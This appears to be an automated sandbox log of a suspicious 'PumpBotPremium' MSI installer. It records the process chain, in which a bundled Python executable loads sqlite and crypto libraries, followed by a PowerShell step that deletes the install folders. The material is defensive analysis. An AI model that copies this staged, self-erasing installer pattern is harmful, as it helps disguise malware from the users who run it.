Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PumpBotPremium.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B605B066270C5298BC361F916947E4D1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B605B066270C5298BC361F916947E4D1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: python310.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: pywintypes310.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: tcl86t.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: tk86t.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: samcli.dll	Jump to behavior
